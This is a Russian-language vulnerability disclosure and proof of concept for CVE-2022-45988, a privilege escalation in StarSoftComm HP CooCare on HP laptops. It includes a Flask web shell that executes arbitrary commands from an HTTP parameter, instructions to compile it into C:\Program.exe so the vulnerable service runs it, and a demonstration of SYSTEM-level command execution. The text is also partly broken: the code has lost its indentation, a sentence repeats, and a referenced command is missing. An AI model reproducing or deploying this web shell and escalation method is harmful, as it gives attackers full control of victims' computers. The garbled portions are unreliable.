
CVE-2022-45988 StarSoftComm HP CooCare Существует уязвимость повышения привилегий
####################################################
Я связался с hp-security-alert, они исправили эту ошибку. О программе StarSoftComm CooCare [HP-PSRT-IR #4106]

Вендор предоставил следующую информацию:
Выполните следующие шаги для обновления:
#####################################
Уязвимость повышения привилегий существует в StarSoftComm HP CooCare, которая может позволить злоумышленнику повысить свой уровень привилегий.
e管家超级版 — это встроенное ПО удалённой диагностики для HP Star 14 pro, разработанное компанией StarSoftComm (软通科技).
Тестировалось на Windows 11 22621.819, HP LAPTOP HP Pavilion Plus 14-дюймовый ноутбук 14-eh0000 (56D77AV).
Затрагиваемая версия: CooCare ниже v5.364
Найти службу (используйте указанную выше команду CMD, чтобы найти неиспользуемые службы)

Имя службы — Windows Application Management Service, сокращённо WinAppMgmt.
Служба называется Windows Application Management Service, сокращённо WinAppMgmt.

Эта служба от StarSoftComm CooCare


from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') #Принимает параметр ?cmd=
a=os.popen(r[0]) #Выполняет системные команды
l = a.read()
return l #Возвращает результат
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) #Слушает HTTP порт 14145
Я использовал python3 flask для создания вредоносного exe. Он слушает HTTP порт 14145 и выполняет системные команды.
Используя команду pyinstaller.exe --onefile --windowed -F -w python_test.py создал вредоносный exe.

Если служба Windows Application Management Service уже запущена, можно перезапустить её

C:\Program.exe запускается от имени системы
Когда я вижу, что служба Windows Application Management Service запущена в Taskmgr.exe с правами SYSTEM, затем я открываю браузер и ввожу http://127.0.0.1:14145?cmd=whoami
Жду...
...
это.
NT SYSTEM
